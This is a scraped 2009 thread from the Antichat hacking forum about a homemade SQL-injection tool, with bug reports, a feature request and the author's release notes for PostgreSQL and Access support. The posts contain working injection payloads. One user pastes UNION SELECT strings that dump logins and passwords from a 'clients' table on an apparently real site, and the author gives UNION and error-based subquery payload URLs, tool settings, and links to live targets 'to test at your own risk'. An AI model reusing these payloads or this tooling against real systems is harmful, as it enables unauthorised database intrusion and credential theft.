Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.11.2009, 08:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
если че: "no News that match that ID" на верный ответ
И? Ну подумай дальше. Такой ответ выдаст на колонки с 1 по 7, какое кол-во принимать за истину? В данном случае невозможно выставить четкий идентификатор правильной колонки, только идентификатор ГРАНИЦЫ, а с какой стороны к этой границе подползать - справа или слева - не суть. То, что только что предложил ты - тоже самое по сути, просто слева, а не справа
из этого вывод: если можно сделай чтоб не тока неправильный ответ настроил, а правильный тоже можно было выбрат как на мускуле
кхм...если знаешь правильный ответ, то зачем подбирать колонки? Значит ты уже знаешь их кол-во.
Последний раз редактировалось Pashkela; 23.11.2009 в 09:17..
|
|
|
23.11.2009, 12:30
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
я имел ввиду эту фукцию добавить и будеть полезно для брута столбцов
|
|
|
|
24.11.2009, 00:21
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
еще на mysql 5 когда сливает данные с information_schema не показывается другие бд. А на других прогах определяется все бд например:
information_schema
tscan_db
tscan_db_hsbc
тут тока один и всё. Сможеш сделать так? |
|
|
|
24.11.2009, 17:34
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 138
Провел на форуме:
1835548
Репутация:
92
|
|
((
Неработает!!!
Обьесните мне, значит вот что у меня не выводит юзеров значит проблема вот в чём я знаю что юзеров 26 но у меня почему-то тулза выводит только 15, я переберал в ручную вот пример
(union+select+1,2,3,password,5,6,7,8,login+from+cl ients+limit+1,1 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+2,1 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+3,1 ну и.т.д но потом у меня лимит меняеться на union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+15,2 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+16,2 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+17,2 ну и,т,д) вот и она невыводит дальше после 15 юзеров потому что лимит меняеться на limit+15,2 подскажите как решить эту проблему!!
связь:359-860-516
|
|
|
|
24.11.2009, 17:53
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от shell_c0de
вот и обидели 4ела =\ докатились....
а мну нравилсо проект почти все в одном...
никто не обижает, я просто тестируб прогу и хочу чтоб работал лучше и говорю про нужных возможных дополнениях
ace89
про лимит уже написали что и как в предыдущих постах, прочитай их
Последний раз редактировалось YuNi|[c; 24.11.2009 в 17:56..
|
|
|
|
24.11.2009, 18:20
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 138
Провел на форуме:
1835548
Репутация:
92
|
|
Млин стукните кто нить в icq
|
|
|
|
24.11.2009, 19:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
update:
PostgreSQL injection:
1. UNION+SELECT method:
- Многопоточный
- Post/Get/Cookies/Proxy & etc.
- Возможность задавать в настройках data type принтабельного поля ("text" - default)
- Авто CHR(data)||
- Остальное все тоже самое, что и в mysql
2. SUBQUERY method:
- Многопоточный
- Post/Get/Cookies/Proxy & etc.
- Возможность задавать в настройках тип конвертации данных для вызова ошибки
- Авто CHR(data)||
- Остальное все тоже самое, что и в mysql
Пример метода UNION+SELECT:
Код:
http://site.com/index.phtml?pid=7+union+select+null,version(),null--
Настройки в скрипте:
$p_union_select_url = "http://site.com/index.phtml?pid=7+union+select+null,^,null"; # url UNION+SELECT method
$p_subquery_url = ""; # url SUBQUERY method
$p_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
$p_filtr = "--"; # close SQL
$p_plus = "+"; # %20,%2b & etc.
$p_convert = "text"; # convert data type(text,int ... etc.)
Пример метода SUBQUERY:
Код:
http://site.com/index.php?id=1+and+1=cast(select+version()+as+int)
или
http://site.com/index.php?id=1+and+1=version()::int
что тоже самое
Настройки в скрипте:
$p_union_select_url = ""; # url UNION+SELECT method
$p_subquery_url = "http://site.com/index.php?id=1+and+1="; # url SUBQUERY method
$p_method = 1; # 0 - UNION+SELECT method, 1 - SUBQUERY method
$p_filtr = ""; # close SQL
$p_plus = "+"; # %20,%2b & etc.
$p_convert = "int"; # convert data type(text,int ... etc.)
PS: Examples - можете потестить на свой страх и риск:
1. UNION+SELECT метод:
https://forum.antichat.ru/showpost.php?p=1308855&postcount=9661
POST-method granted
2. SUBQUERY метод:
https://forum.antichat.ru/showpost.php?p=1704231&postcount=11320
POST-method granted
Последний раз редактировалось Pashkela; 25.11.2009 в 00:27..
|
|
|
|
25.11.2009, 18:24
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Pashkela может алгоритм посмотриш с Silvia sql насчет инъекции access&jet db.
|
|
|
|
25.11.2009, 18:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
а что не так с access? Ты опять про подбор кол-ва колонок?
посмотрел сильвию - аналогичный метод подбора, также слева пляшет и в один поток, пока не встретит "The Microsoft Jet database engine does not recognize", у меня просто код вручную можно вводить (для универсальности, а то изменят надпись и что, гуляй Василий?) - "80004005". А смысл по большому счету тот же
Ну если тебе так нравиться, впиши вместо 80004005 "The Microsoft Jet database engine does not recognize" - будет тоже самое
PS: Какой там нафиг алгоритм, у сильвии даже "+" жестко вписан в код, не говоря уже об возможных close sql. На уровне "прокатит/не прокатит"
Последний раз редактировалось Pashkela; 25.11.2009 в 20:11..
|
|
|
|
25.11.2009, 20:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
update:
Кстати все равно спасибо, что напомнил - оптимизировал (убыстрил) алгоритм подбора колонок в access - теперь узнается практически моментально. Обновления в первом посте.
update:
небольшая общая отпимизация/универсализация кода для различных ситуаций
Последний раз редактировалось Pashkela; 26.11.2009 в 17:35..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
